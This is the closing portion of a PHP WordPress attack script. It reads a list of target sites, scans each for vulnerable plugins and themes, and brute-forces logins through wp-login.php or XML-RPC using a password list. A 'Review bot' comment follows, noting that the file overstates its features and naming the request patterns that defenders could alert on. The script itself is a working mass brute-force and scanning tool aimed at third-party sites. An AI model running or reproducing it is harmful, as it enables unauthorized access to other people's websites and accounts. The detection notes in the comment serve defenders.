        $r00t3rz = explode("\n", $targets);
696
        foreach($r00t3rz as $z){
697
            if(!$z == ""){
698
                xp_get_plugins($z);
699
                xp_get_themes($z);
700
            }
701
        }
702
        #################
703
        ##   Results   ##
704
        #################
705
        print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
706
        $vulpl = file_get_contents('vulpl.txt');
707
        $getpl = explode("\n", $vulpl);
708
        #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
709
        foreach($getpl as $vul){
710
            if(!$vul==""){
711
                print "\n\t$vul";
712
            }
713
        }
714
        bye();
715
    } elseif($what == "3") {
716
        print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
717
        $list = trim(fgets(STDIN));
718
        if(!is_file($list)) {
719
            #######################
720
            ##  CAN'T LOAD LIST  ##
721
            #######################
722
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
723
            ##############
724
            ##   EXIT   ##
725
            ##############
726
            bye();
727
        }
728
        #################
729
        ##   POOYAA!   ##
730
        #################
731
        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
732
        $xmlrpc = strtolower(trim(fgets(STDIN)));
733
        if(in_array($xmlrpc, $yesno)){
734
            $xml = "set";
735
        }else{
736
            $xml = NULL;
737
        }
738
        print "\n[+] Bruting begun";
739
        $targets = file_get_contents('wp.txt');
740
        $xp = explode("\n", $targets);
741
        foreach($xp as $z){
742
            if(!$z == ""){
743
                xp_get_user($z, $list, $xml);
744
            }
745
        }
746
        bye();
747
    } else {
748
        ######################
749
        ##  OOH KILL'EM =P  ##
750
        ######################
751
        bye(); 
752
    }
753
}
754
#####################################
755
##  © ALM3REFH.COM 2014 - CHEERS!  ##
756
#####################################
757
?>
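Review bot: The header comment's feature list (`- Exploit 'em (Using more than 20 new/0day exploits)`) and the `xp_scanner_db` banner (`## - WORDPRESSEXPLOIT.COM` / `## - EXPLOIT-DB.COM`) describe code that is not in this file: the interactive menu offers only list scanning, DB scanning and brute force, and `$wpexploit` holds a single URL, so the documentation overstates what the paste does. `xp_get_themes` also carries the `##   GET ALL PLUGINS   ##` banner copied from `xp_get_plugins`; the banners should be cut down to what the code actually does, e.g. `##   GET ALL THEMES   ##` and `## - WORDPRESSEXPLOIT.COM ONLY ##`. As a point of style, the User-Agent literal `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)` is repeated in ten separate `curl_setopt` calls and would normally be a single named constant. For anyone on the receiving end, that fixed literal together with the `/?author=1` fetch followed by `wp-login.php` POSTs carrying `rememberme=forever`, or `wp.getUsersBlogs` XML-RPC calls against `xmlrpc.php`, is the traffic pattern a login rate limit, WAF rule or web-log alert would key on.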